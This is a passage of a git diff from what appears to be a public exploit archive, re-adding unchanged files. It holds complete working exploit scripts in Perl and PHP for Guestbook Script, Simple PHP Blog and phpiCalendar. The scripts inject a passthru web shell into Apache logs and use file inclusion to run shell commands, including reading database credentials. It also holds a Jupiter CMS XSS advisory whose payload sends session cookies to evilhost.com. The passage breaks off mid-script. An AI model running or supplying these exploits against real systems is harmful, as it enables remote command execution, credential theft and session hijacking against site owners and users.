resources, poc: -# -# http://[target]/[path]/index.php?include_files[]=&include_files[1]=/var/log/httpd/access_log -# http://[target]/[path]/index.php?include_files[]=&include_files[1]=ftp://username:pass@192.168.1.3/suntzu.php -# -# you will not see any output, but code inside the included file will be executed. -# You shoul have a "die()" in included file (to prevent the ob_end_clean() call) -# to see some results... -# This exploit supports two actions: -# -# [1] tries to inject some php code in log files and execute it -# [2] tries to include the code from a ftp location - - -sub main::urlEncode { - my ($string) = @_; - $string =~ s/(\W)/"%" . 
unpack("H2", $1)/ge; - #$string# =~ tr/.//; - return $string; - } - -if (@ARGV < 4) -{ -print "Usage:\r\n"; -print "perl gbs_17_xpl.pl SERVER PATH ACTION[FTP LOCATION] COMMAND\r\n\r\n"; -print "SERVER - Server where Guestbook Script is installed.\r\n"; -print "PATH - Path to Guestbook Script (ex: /gbs/ or just /)\r\n"; -print "ACTION - 1[nothing]\r\n"; -print " (tries to include apache error.log file)\r\n\r\n"; -print " 2[ftp site with the code to include]\r\n\r\n"; -print "COMMAND - A shell command (\"cat config.php\"\r\n"; -print " to see database username & password)\r\n\r\n"; -print "Example:\r\n"; -print "perl gbs_17_xpl.pl 192.168.1.3 /gbs/ 1 cat config.php\r\n"; -print "perl gbs_17_xpl.pl 192.168.1.3 /gbs/ 2ftp://username:password\@192.168.1"; -print ".3/suntzu.php ls -la\r\n\r\n"; -print "Note: to launch action [2] you need this code in suntzu.php :\r\n"; -print "<?php\r\n"; -print "ob_clean();\r\n"; -print "echo 666;\r\n"; -print "if (get_magic_quotes_gpc())\r\n"; -print "{\$_GET[cmd]=stripslashes(\$_GET[cmd]);}\r\n"; -print "passthru(\$_GET[cmd]);\r\n"; -print "echo 666;\r\n"; -print "die;\r\n"; -print "?>\r\n\r\n"; -exit(); -} - -$serv=$ARGV[0]; -$path=$ARGV[1]; -$ACTION=urlEncode($ARGV[2]); -$cmd=""; for ($i=3; $i<=$#ARGV; $i++) {$cmd.="%20".urlEncode($ARGV[$i]);}; -$temp=substr($ACTION,0,1); - -if ($temp==2) { #this works with PHP5 and allow_url_fopen=On - $FTP=substr($ACTION,1,length($ACTION)); - $sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$serv", PeerPort=>"80") - or die "[+] Connecting ... Could not connect to host.\n\n"; - print $sock "GET ".$path."index.php?cmd=".$cmd."&include_files[]=&include_files[1]=".$FTP." 
HTTP/1.1\r\n"; - print $sock "Host: ".$serv."\r\n"; - print $sock "Connection: close\r\n\r\n"; - $out=""; - while ($answer = <$sock>) { - $out.=$answer; - } - close($sock); - @temp= split /666/,$out,3; - if ($#temp>1) {print "\r\nExploit succeeded...\r\n".$temp[1];exit();} - else {print "\r\nExploit failed...\r\n";} - -} elsif ($temp==1) { #this works if path to log files is found and u can have access to them - print "[1] Injecting some code in log files ...\r\n"; - $CODE="<?php ob_clean();echo 666;if (get_magic_quotes_gpc()) {\$_GET[cmd]=stripslashes(\$_GET[cmd]);} passthru(\$_GET[cmd]);echo 666;die;?>"; - $sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$serv", PeerPort=>"80") - or die "[+] Connecting ... Could not connect to host.\n\n"; - print $sock "GET ".$path.$CODE." HTTP/1.1\r\n"; - print $sock "User-Agent: ".$CODE."\r\n"; - print $sock "Host: ".$serv."\r\n"; - print $sock "Connection: close\r\n\r\n"; - close($sock); - - # fill with possible locations - my @paths= ( - "/var/log/httpd/access_log", #Fedora, default - "/var/log/httpd/error_log", #... - "../apache/logs/error.log", #Windows - "../apache/logs/access.log", - "../../apache/logs/error.log", - "../../apache/logs/access.log", - "../../../apache/logs/error.log", - "../../../apache/logs/access.log", #and so on... 
collect some log paths, you will succeed - "/etc/httpd/logs/acces_log", - "/etc/httpd/logs/acces.log", - "/etc/httpd/logs/error_log", - "/etc/httpd/logs/error.log", - "/var/www/logs/access_log", - "/var/www/logs/access.log", - "/usr/local/apache/logs/access_log", - "/usr/local/apache/logs/access.log", - "/var/log/apache/access_log", - "/var/log/apache/access.log", - "/var/log/access_log", - "/var/www/logs/error_log", - "/var/www/logs/error.log", - "/usr/local/apache/logs/error_log", - "/usr/local/apache/logs/error.log", - "/var/log/apache/error_log", - "/var/log/apache/error.log", - "/var/log/access_log", - "/var/log/error_log" - ); - - for ($i=0; $i<=$#paths; $i++) - { - $a = $i + 2; - print "[".$a."] trying with ".$paths[$i]."\r\n"; - $sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$serv", PeerPort=>"80") - or die "[+] Connecting ... Could not connect to host.\n\n"; - print $sock "GET ".$path."index.php?cmd=".$cmd."&include_files[]=&include_files[1]=".urlEncode($paths[$i])." HTTP/1.1\r\n"; - print $sock "Host: ".$serv."\r\n"; - print $sock "Connection: close\r\n\r\n"; - $out=''; - while ($answer = <$sock>) { - $out.=$answer; - } - close($sock); - @temp= split /666/,$out,3; - if ($#temp>1) {print "\r\nExploit succeeded...\r\n".$temp[1];exit();} - - } - #if you are here... - print "\r\nExploit failed...\r\n"; -} else { - print "No action specified ...\r\n"; -} - -# milw0rm.com [2006-03-11] +#!/usr/bin/perl +use IO::Socket; + +print "guestbook script <= 1.7 exploit\r\n"; +print "rgod rgod\@autistici.org\r\n"; +print "dork: \"powered by guestbook script\"\r\n\r\n"; + +# short explaination: +# we have this code in nearly all scripts: +# ... +# if (isset ($include_files) and is_array ($include_files)) { +# reset ($include_files); +# while(list($key, $val) = each($include_files)) +# { +# +# if ($file_content = include_content($val)) { +# $$key = $file_content; +# } else { +# $$key = '<pre>[' . $txt['txt_file_not_found'] . ': ' . $val . 
']</pre>'; +# } +# $tpl->register('guest', $key); +# } +# } +#... +# here is include_content() function: +# +# function include_content($path) +# { +# +# if (is_file($path)) { +# ob_start(); +# +# include($path); +# $content = ob_get_contents(); +# ob_end_clean(); +# } +# +# if (isset($content)) { +# return $content; +# } +# } +# +# you can include code from local resources and (on PHP5, because is_file() +# function support ftp wrappers) remote resources, poc: +# +# http://[target]/[path]/index.php?include_files[]=&include_files[1]=/var/log/httpd/access_log +# http://[target]/[path]/index.php?include_files[]=&include_files[1]=ftp://username:pass@192.168.1.3/suntzu.php +# +# you will not see any output, but code inside the included file will be executed. +# You shoul have a "die()" in included file (to prevent the ob_end_clean() call) +# to see some results... +# This exploit supports two actions: +# +# [1] tries to inject some php code in log files and execute it +# [2] tries to include the code from a ftp location + + +sub main::urlEncode { + my ($string) = @_; + $string =~ s/(\W)/"%" . 
unpack("H2", $1)/ge; + #$string# =~ tr/.//; + return $string; + } + +if (@ARGV < 4) +{ +print "Usage:\r\n"; +print "perl gbs_17_xpl.pl SERVER PATH ACTION[FTP LOCATION] COMMAND\r\n\r\n"; +print "SERVER - Server where Guestbook Script is installed.\r\n"; +print "PATH - Path to Guestbook Script (ex: /gbs/ or just /)\r\n"; +print "ACTION - 1[nothing]\r\n"; +print " (tries to include apache error.log file)\r\n\r\n"; +print " 2[ftp site with the code to include]\r\n\r\n"; +print "COMMAND - A shell command (\"cat config.php\"\r\n"; +print " to see database username & password)\r\n\r\n"; +print "Example:\r\n"; +print "perl gbs_17_xpl.pl 192.168.1.3 /gbs/ 1 cat config.php\r\n"; +print "perl gbs_17_xpl.pl 192.168.1.3 /gbs/ 2ftp://username:password\@192.168.1"; +print ".3/suntzu.php ls -la\r\n\r\n"; +print "Note: to launch action [2] you need this code in suntzu.php :\r\n"; +print "<?php\r\n"; +print "ob_clean();\r\n"; +print "echo 666;\r\n"; +print "if (get_magic_quotes_gpc())\r\n"; +print "{\$_GET[cmd]=stripslashes(\$_GET[cmd]);}\r\n"; +print "passthru(\$_GET[cmd]);\r\n"; +print "echo 666;\r\n"; +print "die;\r\n"; +print "?>\r\n\r\n"; +exit(); +} + +$serv=$ARGV[0]; +$path=$ARGV[1]; +$ACTION=urlEncode($ARGV[2]); +$cmd=""; for ($i=3; $i<=$#ARGV; $i++) {$cmd.="%20".urlEncode($ARGV[$i]);}; +$temp=substr($ACTION,0,1); + +if ($temp==2) { #this works with PHP5 and allow_url_fopen=On + $FTP=substr($ACTION,1,length($ACTION)); + $sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$serv", PeerPort=>"80") + or die "[+] Connecting ... Could not connect to host.\n\n"; + print $sock "GET ".$path."index.php?cmd=".$cmd."&include_files[]=&include_files[1]=".$FTP." 
HTTP/1.1\r\n"; + print $sock "Host: ".$serv."\r\n"; + print $sock "Connection: close\r\n\r\n"; + $out=""; + while ($answer = <$sock>) { + $out.=$answer; + } + close($sock); + @temp= split /666/,$out,3; + if ($#temp>1) {print "\r\nExploit succeeded...\r\n".$temp[1];exit();} + else {print "\r\nExploit failed...\r\n";} + +} elsif ($temp==1) { #this works if path to log files is found and u can have access to them + print "[1] Injecting some code in log files ...\r\n"; + $CODE="<?php ob_clean();echo 666;if (get_magic_quotes_gpc()) {\$_GET[cmd]=stripslashes(\$_GET[cmd]);} passthru(\$_GET[cmd]);echo 666;die;?>"; + $sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$serv", PeerPort=>"80") + or die "[+] Connecting ... Could not connect to host.\n\n"; + print $sock "GET ".$path.$CODE." HTTP/1.1\r\n"; + print $sock "User-Agent: ".$CODE."\r\n"; + print $sock "Host: ".$serv."\r\n"; + print $sock "Connection: close\r\n\r\n"; + close($sock); + + # fill with possible locations + my @paths= ( + "/var/log/httpd/access_log", #Fedora, default + "/var/log/httpd/error_log", #... + "../apache/logs/error.log", #Windows + "../apache/logs/access.log", + "../../apache/logs/error.log", + "../../apache/logs/access.log", + "../../../apache/logs/error.log", + "../../../apache/logs/access.log", #and so on... 
collect some log paths, you will succeed + "/etc/httpd/logs/acces_log", + "/etc/httpd/logs/acces.log", + "/etc/httpd/logs/error_log", + "/etc/httpd/logs/error.log", + "/var/www/logs/access_log", + "/var/www/logs/access.log", + "/usr/local/apache/logs/access_log", + "/usr/local/apache/logs/access.log", + "/var/log/apache/access_log", + "/var/log/apache/access.log", + "/var/log/access_log", + "/var/www/logs/error_log", + "/var/www/logs/error.log", + "/usr/local/apache/logs/error_log", + "/usr/local/apache/logs/error.log", + "/var/log/apache/error_log", + "/var/log/apache/error.log", + "/var/log/access_log", + "/var/log/error_log" + ); + + for ($i=0; $i<=$#paths; $i++) + { + $a = $i + 2; + print "[".$a."] trying with ".$paths[$i]."\r\n"; + $sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$serv", PeerPort=>"80") + or die "[+] Connecting ... Could not connect to host.\n\n"; + print $sock "GET ".$path."index.php?cmd=".$cmd."&include_files[]=&include_files[1]=".urlEncode($paths[$i])." HTTP/1.1\r\n"; + print $sock "Host: ".$serv."\r\n"; + print $sock "Connection: close\r\n\r\n"; + $out=''; + while ($answer = <$sock>) { + $out.=$answer; + } + close($sock); + @temp= split /666/,$out,3; + if ($#temp>1) {print "\r\nExploit succeeded...\r\n".$temp[1];exit();} + + } + #if you are here... + print "\r\nExploit failed...\r\n"; +} else { + print "No action specified ...\r\n"; +} + +# milw0rm.com [2006-03-11] diff --git a/platforms/php/webapps/1576.txt b/platforms/php/webapps/1576.txt index a4ebbf874..d8877ee26 100755 --- a/platforms/php/webapps/1576.txt +++ b/platforms/php/webapps/1576.txt 
@@ -1,35 +1,35 @@ -Jupiter CMS <= 1.1.5 multiple XSS attack vectors. - -Discovered by: Nomenumbra/[0x4F4C] Date: 3/11/2006 impact:high (privilege escalation,site defacement) - -Jupiter CMS (http://www.highstrike.net/) is a dynamic CMS system like mambo or limbo, allowing users -to subscribe and posts events. Because no filtering is done upon [image] BBcode input, any user is -capable of inserting arbitrary javascript code, allowing for credential theft leading/session -hijacking and possibly site defacement. - -Examples: - -This would make a messagebox pop up saying 'XSS', whenever the events get loaded (on the main page, -calender,etc): [image=javascript:alert('XSS')] - -This would allow an attacker to steal session ID's, which he could insert into his own cookie to -hijack sessions and elevate his/her privileges: - -[image=javascript:window.navigate('http://www.evilhost.com/cookiestealer.php?c='+document.cookie)] - -It would be used with SjaakRake's cookie stealer (http://www.milw0rm.com/exploits/1103), with maybe -the addition of a header("location: ".<anythinghere>), to redirect the user to a page of your choice, -to avoid suspicion and disclosure of your cookiestealer's location. - -This injections would allow an attacker to redirect users to a page of his choice, effectively -defacing the page: - -[image=javascript:window.navigate('http://www.evilhost.com/pwned.html')] - -As you can see the possibilities are limitless, as long as you have a bit of fantasy! - -Nomenumbra/[0x4F4C] - -Questions: zerogue@gmail.com Site: http://0x4f4c.awardspace.com - -# milw0rm.com [2006-03-11] +Jupiter CMS <= 1.1.5 multiple XSS attack vectors. + +Discovered by: Nomenumbra/[0x4F4C] Date: 3/11/2006 impact:high (privilege escalation,site defacement) + +Jupiter CMS (http://www.highstrike.net/) is a dynamic CMS system like mambo or limbo, allowing users +to subscribe and posts events. 
Because no filtering is done upon [image] BBcode input, any user is +capable of inserting arbitrary javascript code, allowing for credential theft leading/session +hijacking and possibly site defacement. + +Examples: + +This would make a messagebox pop up saying 'XSS', whenever the events get loaded (on the main page, +calender,etc): [image=javascript:alert('XSS')] + +This would allow an attacker to steal session ID's, which he could insert into his own cookie to +hijack sessions and elevate his/her privileges: + +[image=javascript:window.navigate('http://www.evilhost.com/cookiestealer.php?c='+document.cookie)] + +It would be used with SjaakRake's cookie stealer (http://www.milw0rm.com/exploits/1103), with maybe +the addition of a header("location: ".<anythinghere>), to redirect the user to a page of your choice, +to avoid suspicion and disclosure of your cookiestealer's location. + +This injections would allow an attacker to redirect users to a page of his choice, effectively +defacing the page: + +[image=javascript:window.navigate('http://www.evilhost.com/pwned.html')] + +As you can see the possibilities are limitless, as long as you have a bit of fantasy! + +Nomenumbra/[0x4F4C] + +Questions: zerogue@gmail.com Site: http://0x4f4c.awardspace.com + +# milw0rm.com [2006-03-11] diff --git a/platforms/php/webapps/1581.pl b/platforms/php/webapps/1581.pl index 5d1f33ba2..5718cbbcd 100755 --- a/platforms/php/webapps/1581.pl +++ b/platforms/php/webapps/1581.pl 
@@ -1,126 +1,126 @@ -#!/usr/bin/perl -use IO::Socket; - -print "Simple PHP Blog <= 0.4.7.1 cmmnds xctn exploit\r\n"; -print "through arbitrary local inclusion\r\n"; -print "rgod rgod\@autistici.org\r\n"; -print "-> this works with magic_quotes_gpc = Off\r\n\r\n"; - -# short explaination: -# we have this code in install05.php: -# <?php -# require_once('scripts/sb_functions.php'); -# global $logged_in; -# $logged_in = logged_in( false, false ); -# -# read_config(); -# -# global $blog_config; -# if ( isset( $_GET[ 'blog_language' ] ) ) { -# $blog_config[ 'blog_language' ] = $_GET[ 'blog_language' ]; -# } -# -# require_once('languages/' . $blog_config[ 'blog_language' ] . '/strings.php'); -# sb_language( 'install05' ); -# ?> -# ... -# -# script is not deleted after installation, so, if magic_quotes_gpc = Off, -# you can include an arbitrary file from local resources, poc: -# -# http://[target]/[path_to_blog]/install05.php?blog_language=../../../../../../etc/passwd%00 -# -# (breaking path through a null char) -# -# it seems you cannot inject php code (php tags are converted to html entities) -# in SPB resources, but you can inject a shell in Apache logs, so... : -# -# http://[target]/[path]/install05.php?blog_language=../../../../../../var/log/httpd/access_log%00&cmd=ls%20-la - -sub main::urlEncode { - my ($string) = @_; - $string =~ s/(\W)/"%" . 
unpack("H2", $1)/ge; - #$string# =~ tr/.//; - return $string; - } - -if (@ARGV < 3) -{ -print "Usage:\r\n"; -print "perl spb_0471_incl.pl SERVER PATH COMMAND\r\n\r\n"; -print "SERVER - Server where Simple PHP Blog is installed.\r\n"; -print "PATH - Path to Simple PHP Blog (ex: /spb/ or just /)\r\n"; -print "COMMAND - A shell command (\"cat ./config/password.php\"\r\n"; -print " to see encrypted username & password)\r\n\r\n"; -print "Example:\r\n"; -print "perl spb_0471_incl.pl 192.168.1.3 /gbs/ ls -la\r\n"; -exit(); -} - -$serv=$ARGV[0]; -$path=$ARGV[1]; -$cmd=""; for ($i=2; $i<=$#ARGV; $i++) {$cmd.="%20".urlEncode($ARGV[$i]);}; - -print "[1] Injecting some code in log files ...\r\n"; -$CODE="<?php ob_clean();echo 666;passthru(\$_GET[cmd]);echo 666;die;?>"; -$sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$serv", PeerPort=>"80") -or die "[+] Connecting ... Could not connect to host.\n\n"; -print $sock "GET ".$path.$CODE." HTTP/1.1\r\n"; -print $sock "User-Agent: ".$CODE."\r\n"; -print $sock "Host: ".$serv."\r\n"; -print $sock "Connection: close\r\n\r\n"; -close($sock); - -# fill with possible locations -my @paths= ( -"../../../../../../../../../../var/log/httpd/access_log", -"../../../../../../../../../../var/log/httpd/error_log", -"../apache/logs/error.log", -"../apache/logs/access.log", -"../../apache/logs/error.log", -"../../apache/logs/access.log", -"../../../apache/logs/error.log", -"../../../apache/logs/access.log", -"../../../../../../../../../../etc/httpd/logs/acces_log", -"../../../../../../../../../../etc/httpd/logs/acces.log", -"../../../../../../../../../../etc/httpd/logs/error_log", -"../../../../../../../../../../etc/httpd/logs/error.log", -"../../../../../../../../../../var/www/logs/access_log", -"../../../../../../../../../../var/www/logs/access.log", -"../../../../../../../../../../usr/local/apache/logs/access_log", -"../../../../../../../../../../usr/local/apache/logs/access.log", -"../../../../../../../../../../var/log/apache/access_log", 
-"../../../../../../../../../../var/log/apache/access.log", -"../../../../../../../../../../var/log/access_log", -"../../../../../../../../../../var/www/logs/error_log", -"../../../../../../../../../../var/www/logs/error.log", -"../../../../../../../../../../usr/local/apache/logs/error_log", -"../../../../../../../../../../usr/local/apache/logs/error.log", -"../../../../../../../../../../var/log/apache/error_log", -"../../../../../../../../../../var/log/apache/error.log", -"../../../../../../../../../../var/log/access_log", -"../../../../../../../../../../var/log/error_log" -); - - for ($i=0; $i<=$#paths; $i++) - { - $a = $i + 2; - print "[".$a."] trying with ".$paths[$i]."%00 for blog_language argument...\r\n"; - $sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$serv", PeerPort=>"80") - or die "[+] Connecting ... Could not connect to host.\n\n"; - print $sock "GET ".$path."install05.php?cmd=".$cmd."&blog_language=".urlEncode($paths[$i])."%00 HTTP/1.1\r\n"; - print $sock "Host: ".$serv."\r\n"; - print $sock "Connection: close\r\n\r\n"; - $out=''; - while ($answer = <$sock>) { - $out.=$answer; - } - close($sock); - @temp= split /666/,$out,3; - if ($#temp>1) {print "\r\nExploit succeeded...\r\n".$temp[1];exit();} - - } - #if you are here... - print "\r\nExploit failed...\r\n"; - -# milw0rm.com [2006-03-13] +#!/usr/bin/perl +use IO::Socket; + +print "Simple PHP Blog <= 0.4.7.1 cmmnds xctn exploit\r\n"; +print "through arbitrary local inclusion\r\n"; +print "rgod rgod\@autistici.org\r\n"; +print "-> this works with magic_quotes_gpc = Off\r\n\r\n"; + +# short explaination: +# we have this code in install05.php: +# <?php +# require_once('scripts/sb_functions.php'); +# global $logged_in; +# $logged_in = logged_in( false, false ); +# +# read_config(); +# +# global $blog_config; +# if ( isset( $_GET[ 'blog_language' ] ) ) { +# $blog_config[ 'blog_language' ] = $_GET[ 'blog_language' ]; +# } +# +# require_once('languages/' . $blog_config[ 'blog_language' ] . 
'/strings.php'); +# sb_language( 'install05' ); +# ?> +# ... +# +# script is not deleted after installation, so, if magic_quotes_gpc = Off, +# you can include an arbitrary file from local resources, poc: +# +# http://[target]/[path_to_blog]/install05.php?blog_language=../../../../../../etc/passwd%00 +# +# (breaking path through a null char) +# +# it seems you cannot inject php code (php tags are converted to html entities) +# in SPB resources, but you can inject a shell in Apache logs, so... : +# +# http://[target]/[path]/install05.php?blog_language=../../../../../../var/log/httpd/access_log%00&cmd=ls%20-la + +sub main::urlEncode { + my ($string) = @_; + $string =~ s/(\W)/"%" . unpack("H2", $1)/ge; + #$string# =~ tr/.//; + return $string; + } + +if (@ARGV < 3) +{ +print "Usage:\r\n"; +print "perl spb_0471_incl.pl SERVER PATH COMMAND\r\n\r\n"; +print "SERVER - Server where Simple PHP Blog is installed.\r\n"; +print "PATH - Path to Simple PHP Blog (ex: /spb/ or just /)\r\n"; +print "COMMAND - A shell command (\"cat ./config/password.php\"\r\n"; +print " to see encrypted username & password)\r\n\r\n"; +print "Example:\r\n"; +print "perl spb_0471_incl.pl 192.168.1.3 /gbs/ ls -la\r\n"; +exit(); +} + +$serv=$ARGV[0]; +$path=$ARGV[1]; +$cmd=""; for ($i=2; $i<=$#ARGV; $i++) {$cmd.="%20".urlEncode($ARGV[$i]);}; + +print "[1] Injecting some code in log files ...\r\n"; +$CODE="<?php ob_clean();echo 666;passthru(\$_GET[cmd]);echo 666;die;?>"; +$sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$serv", PeerPort=>"80") +or die "[+] Connecting ... Could not connect to host.\n\n"; +print $sock "GET ".$path.$CODE." 
HTTP/1.1\r\n"; +print $sock "User-Agent: ".$CODE."\r\n"; +print $sock "Host: ".$serv."\r\n"; +print $sock "Connection: close\r\n\r\n"; +close($sock); + +# fill with possible locations +my @paths= ( +"../../../../../../../../../../var/log/httpd/access_log", +"../../../../../../../../../../var/log/httpd/error_log", +"../apache/logs/error.log", +"../apache/logs/access.log", +"../../apache/logs/error.log", +"../../apache/logs/access.log", +"../../../apache/logs/error.log", +"../../../apache/logs/access.log", +"../../../../../../../../../../etc/httpd/logs/acces_log", +"../../../../../../../../../../etc/httpd/logs/acces.log", +"../../../../../../../../../../etc/httpd/logs/error_log", +"../../../../../../../../../../etc/httpd/logs/error.log", +"../../../../../../../../../../var/www/logs/access_log", +"../../../../../../../../../../var/www/logs/access.log", +"../../../../../../../../../../usr/local/apache/logs/access_log", +"../../../../../../../../../../usr/local/apache/logs/access.log", +"../../../../../../../../../../var/log/apache/access_log", +"../../../../../../../../../../var/log/apache/access.log", +"../../../../../../../../../../var/log/access_log", +"../../../../../../../../../../var/www/logs/error_log", +"../../../../../../../../../../var/www/logs/error.log", +"../../../../../../../../../../usr/local/apache/logs/error_log", +"../../../../../../../../../../usr/local/apache/logs/error.log", +"../../../../../../../../../../var/log/apache/error_log", +"../../../../../../../../../../var/log/apache/error.log", +"../../../../../../../../../../var/log/access_log", +"../../../../../../../../../../var/log/error_log" +); + + for ($i=0; $i<=$#paths; $i++) + { + $a = $i + 2; + print "[".$a."] trying with ".$paths[$i]."%00 for blog_language argument...\r\n"; + $sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$serv", PeerPort=>"80") + or die "[+] Connecting ... 
Could not connect to host.\n\n"; + print $sock "GET ".$path."install05.php?cmd=".$cmd."&blog_language=".urlEncode($paths[$i])."%00 HTTP/1.1\r\n"; + print $sock "Host: ".$serv."\r\n"; + print $sock "Connection: close\r\n\r\n"; + $out=''; + while ($answer = <$sock>) { + $out.=$answer; + } + close($sock); + @temp= split /666/,$out,3; + if ($#temp>1) {print "\r\nExploit succeeded...\r\n".$temp[1];exit();} + + } + #if you are here... + print "\r\nExploit failed...\r\n"; + +# milw0rm.com [2006-03-13] diff --git a/platforms/php/webapps/1585.php b/platforms/php/webapps/1585.php index 965ced397..79b2e5a11 100755 --- a/platforms/php/webapps/1585.php +++ b/platforms/php/webapps/1585.php 
@@ -1,178 +1,178 @@ -#!/usr/bin/php -q -d short_open_tag=on -<? -echo "php iCalendar <=2.21 \"cookie_language\"/\"cookie_style\" remote cmmnds xctn\r\n"; -echo "-> arbitrary local inclusion through cookies\r\n"; -echo "by rgod rgod<AT>autistici<DOT>org\r\n"; -echo "site: http://retrogod.altervista.org\r\n\r\n"; - -# short explaination: phpICal stores language & template user preferences inside -# cookies. Theese values are used to include files, but there is no check for -# "../" chars... also you can break path trough a null char (%00) regardless of any -# magic_quotes_gpc settings, because they are serialized & we have a stripslashes -# on them. This code inject a shell in Apache log files, then tries to include -# it through phpicalendar[cookie_language] & phpicalendar[cookie_style] cookies - -if ($argc<3) { -echo "Usage: php ".$argv[0]." host path cmd OPTIONS\r\n"; -echo "host: target server (ip/hostname)\r\n"; -echo "path: path to phpICal\r\n"; -echo "cmd: a shell command\r\n"; -echo "Options:\r\n"; -echo " -p[port]: specify a port other than 80\r\n"; -echo " -P[ip:port]: specify a proxy\r\n"; -echo "Examples:\r\n"; -echo "php ".$argv[0]." 
localhost /phpical/ ls -la\r\n"; -die; -} - -error_reporting(0); -ini_set("max_execution_time",0); -ini_set("default_socket_timeout",5); - -function quick_dump($string) -{ - $result='';$exa='';$cont=0; - for ($i=0; $i<=strlen($string)-1; $i++) - { - if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 )) - {$result.=" .";} - else - {$result.=" ".$string[$i];} - if (strlen(dechex(ord($string[$i])))==2) - {$exa.=" ".dechex(ord($string[$i]));} - else - {$exa.=" 0".dechex(ord($string[$i]));} - $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";} - } - return $exa."\r\n".$result; -} -$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)'; -function sendpacketii($packet) -{ - global $proxy, $host, $port, $html, $proxy_regex; - if ($proxy=='') { - $ock=fsockopen(gethostbyname($host),$port); - if (!$ock) { - echo 'No response from '.$host.':'.$port; die; - } - } - else { - $c = preg_match($proxy_regex,$proxy); - if (!$c) { - echo 'Not a valid proxy...';die; - } - $parts=explode(':',$proxy); - echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n"; - $ock=fsockopen($parts[0],$parts[1]); - if (!$ock) { - echo 'No response from proxy...';die; - } - } - fputs($ock,$packet); - if ($proxy=='') { - $html=''; - while (!feof($ock)) { - $html.=fgets($ock); - } - } - else { - $html=''; - while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) { - $html.=fread($ock,1); - } - } - fclose($ock); - #debug - #echo "\r\n".$html; -} - -$host=$argv[1]; -$path=$argv[2]; -$cmd="";$port=80;$proxy=""; - -for ($i=3; $i<=$argc-1; $i++){ -$temp=$argv[$i][0].$argv[$i][1]; -if (($temp<>"-p") and ($temp<>"-P")) -{$cmd.=" ".$argv[$i];} -if ($temp=="-p") -{ - $port=str_replace("-p","",$argv[$i]); -} -if ($temp=="-P") -{ - $proxy=str_replace("-P","",$argv[$i]); -} -} -$cmd=urlencode($cmd); -if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... 
check the path!'; die;} -if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;} - -echo "[1] Injecting some code in log files...\r\n"; -$CODE ='<?php ob_clean();echo 666;if (get_magic_quotes_gpc()) {$_GET[cmd]=striplashes($_GET[cmd]);}'; -$CODE.='passthru($_GET[cmd]);echo 666;die;?>'; -$packet.="GET ".$path.$CODE." HTTP/1.1\r\n"; -$packet.="User-Agent: ".$CODE."\r\n"; -$packet.="Host: ".$serv."\r\n"; -$packet.="Connection: close\r\n\r\n"; -#debug -#echo quick_dump($packet); -sendpacketii($packet); - -# fill with possible locations -$paths= array ( -"../../../../../../../../../../var/log/httpd/access_log", -"../../../../../../../../../../var/log/httpd/error_log", -"../apache/logs/error.log", -"../apache/logs/access.log", -"../../apache/logs/error.log", -"../../apache/logs/access.log", -"../../../apache/logs/error.log", -"../../../apache/logs/access.log", -"../../../../../../../../../../etc/httpd/logs/acces_log", -"../../../../../../../../../../etc/httpd/logs/acces.log", -"../../../../../../../../../../etc/httpd/logs/error_log", -"../../../../../../../../../../etc/httpd/logs/error.log", -"../../../../../../../../../../var/www/logs/access_log", -"../../../../../../../../../../var/www/logs/access.log", -"../../../../../../../../../../usr/local/apache/logs/access_log", -"../../../../../../../../../../usr/local/apache/logs/access.log", -"../../../../../../../../../../var/log/apache/access_log", -"../../../../../../../../../../var/log/apache/access.log", -"../../../../../../../../../../var/log/access_log", -"../../../../../../../../../../var/www/logs/error_log", -"../../../../../../../../../../var/www/logs/error.log", -"../../../../../../../../../../usr/local/apache/logs/error_log", -"../../../../../../../../../../usr/local/apache/logs/error.log", -"../../../../../../../../../../var/log/apache/error_log", -"../../../../../../../../../../var/log/apache/error.log", -"../../../../../../../../../../var/log/access_log", 
-"../../../../../../../../../../var/log/error_log" -); - -for ($i=0; $i<=count($paths)-1; $i++) -{ - $j=$i+2; - echo "[".$j."] Trying with ".$paths[$i]."%00\r\n"; - $xpl=$paths[$i].chr(0x00); - $phpicalendar['cookie_language']=$xpl; - $phpicalendar['cookie_style']=$xpl; - $xpl=urlencode(serialize($phpicalendar)); - $packet ="GET ".$p."day.php?cmd=".$cmd." HTTP/1.0\r\n"; - $packet.="Host: ".$host."\r\n"; - $packet.="Cookie: phpicalendar=".$xpl."; PHPSESSID=;\r\n"; - $packet.="Connection: Close\r\n\r\n"; - #debug, shows packets in a nice format - #echo quick_dump($packet); - sendpacketii($packet); - if (strstr($html,"666")){ - echo "Exploit succeeded...\r\n"; - $temp=explode("666",$html); - echo $temp[1]; - die; - } -} -#if you are here... -echo "Exploit failed..."; -?> - -# milw0rm.com [2006-03-15] +#!/usr/bin/php -q -d short_open_tag=on +<? +echo "php iCalendar <=2.21 \"cookie_language\"/\"cookie_style\" remote cmmnds xctn\r\n"; +echo "-> arbitrary local inclusion through cookies\r\n"; +echo "by rgod rgod<AT>autistici<DOT>org\r\n"; +echo "site: http://retrogod.altervista.org\r\n\r\n"; + +# short explaination: phpICal stores language & template user preferences inside +# cookies. Theese values are used to include files, but there is no check for +# "../" chars... also you can break path trough a null char (%00) regardless of any +# magic_quotes_gpc settings, because they are serialized & we have a stripslashes +# on them. This code inject a shell in Apache log files, then tries to include +# it through phpicalendar[cookie_language] & phpicalendar[cookie_style] cookies + +if ($argc<3) { +echo "Usage: php ".$argv[0]." host path cmd OPTIONS\r\n"; +echo "host: target server (ip/hostname)\r\n"; +echo "path: path to phpICal\r\n"; +echo "cmd: a shell 